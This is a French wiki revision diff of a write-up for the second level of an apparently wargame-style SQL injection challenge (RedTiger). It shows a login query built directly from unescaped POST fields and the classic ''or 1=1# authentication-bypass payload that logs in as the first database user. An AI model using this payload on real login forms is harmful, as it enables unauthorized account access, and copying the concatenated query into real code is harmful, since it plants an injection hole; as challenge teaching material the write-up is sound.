Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
redtiger_level2 [2015/06/21 19:50] Geographer créée |
redtiger_level2 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 13: | Ligne 13: | ||
<code>SELECT * FROM users WHERE username='$_POST["username"]' AND password='$_POST["password"]';</code> | <code>SELECT * FROM users WHERE username='$_POST["username"]' AND password='$_POST["password"]';</code> | ||
- | Si les entrées utilisateurs ne sont pas protégées nous pouvons forcer les clauses \texttt{WHERE} à TRUE. En effet, en injectant comme nom d'utilisateur et comme mot de passe nous obtenons une requête valide et vraie. | + | Si les entrées utilisateurs ne sont pas protégées nous pouvons forcer les clauses WHERE à TRUE. En effet, en injectant comme nom d'utilisateur et comme mot de passe nous obtenons une requête valide et vraie. |
<code> | <code> | ||
- | SELECT * FROM users WHERE username=''or 1=1#' | + | SELECT * FROM users WHERE username=''or 1=1#' AND password=''or 1=1#'; |
</code> | </code> | ||
Nous obtenons un accès sur le compte du premier utilisateur de la base données. | Nous obtenons un accès sur le compte du premier utilisateur de la base données. |